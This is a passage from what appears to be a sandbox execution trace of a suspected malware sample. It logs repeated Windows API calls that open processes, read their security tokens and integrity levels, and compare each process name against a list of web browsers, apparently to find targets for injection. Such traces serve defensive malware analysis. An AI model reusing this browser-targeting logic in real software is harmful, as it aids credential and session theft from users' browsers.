DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.276] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.276] GetLastError () returned 0x7a [0249.276] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.276] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.276] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.276] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.276] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0249.276] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.277] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.277] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.277] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x548 [0249.277] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.277] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.277] GetLastError () returned 0x7a [0249.277] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.277] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.277] CloseHandle (hObject=0x340) returned 1 [0249.277] CloseHandle (hObject=0x548) returned 1 [0249.277] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.277] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.277] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.277] GetLastError () returned 0x7a [0249.277] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.277] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.277] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.277] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.277] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0249.277] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.277] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.277] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.277] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0249.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x548 [0249.277] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.277] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.277] GetLastError () returned 0x7a [0249.277] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.277] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.277] CloseHandle (hObject=0x340) returned 1 [0249.277] CloseHandle (hObject=0x548) returned 1 [0249.277] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.277] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.277] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.278] GetLastError () returned 0x7a [0249.278] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.278] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.278] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.278] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.278] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.278] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.278] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.278] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.278] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0249.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x548 [0249.278] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.278] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.278] GetLastError () returned 0x7a [0249.278] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.278] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.278] CloseHandle (hObject=0x340) returned 1 [0249.278] CloseHandle (hObject=0x548) returned 1 [0249.278] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.278] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.278] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.278] GetLastError () returned 0x7a [0249.278] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.278] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.278] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.278] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0249.278] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0249.278] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0249.278] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0249.278] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0249.278] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0249.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x548 [0249.278] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.278] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.278] GetLastError () returned 0x7a [0249.278] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.279] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.279] CloseHandle (hObject=0x340) returned 1 [0249.279] CloseHandle (hObject=0x548) returned 1 [0249.279] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.279] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.279] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.279] GetLastError () returned 0x7a [0249.279] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.279] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.279] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.279] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0249.279] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0249.279] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0249.279] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0249.279] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0249.279] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0249.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0249.279] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.279] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.279] GetLastError () returned 0x7a [0249.279] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.279] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.279] CloseHandle (hObject=0x340) returned 1 [0249.279] CloseHandle (hObject=0x548) returned 1 [0249.279] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.279] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.279] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.279] GetLastError () returned 0x7a [0249.279] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.279] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.279] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.280] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0249.280] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0249.280] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0249.280] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0249.280] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0249.280] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0249.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0249.280] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.280] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.280] GetLastError () returned 0x7a [0249.280] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.280] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.280] CloseHandle (hObject=0x340) returned 1 [0249.280] CloseHandle (hObject=0x548) returned 1 [0249.280] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.280] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.280] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.280] GetLastError () returned 0x7a [0249.280] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.280] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.280] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.280] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0249.280] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0249.280] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0249.280] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0249.280] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0249.280] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0249.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0249.280] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.280] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.280] GetLastError () returned 0x7a [0249.280] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.280] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.280] CloseHandle (hObject=0x340) returned 1 [0249.280] CloseHandle (hObject=0x548) returned 1 [0249.280] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.281] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.281] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.281] GetLastError () returned 0x7a [0249.281] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.281] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.281] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.281] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.281] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0249.281] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.281] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.281] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.281] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0249.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0249.281] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.281] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.281] GetLastError () returned 0x7a [0249.281] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.281] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.281] CloseHandle (hObject=0x340) returned 1 [0249.281] CloseHandle (hObject=0x548) returned 1 [0249.281] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.281] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0249.281] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0249.281] GetLastError () returned 0x7a [0249.281] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0249.281] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0249.281] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0249.281] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0249.281] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0249.281] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0249.281] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0249.281] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0249.281] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0249.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0249.281] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0249.281] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0249.282] GetLastError () returned 0x7a [0249.282] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0249.282] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0249.282] CloseHandle (hObject=0x340) returned 1 [0249.282] CloseHandle (hObject=0x548) returned 1 [0249.282] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, 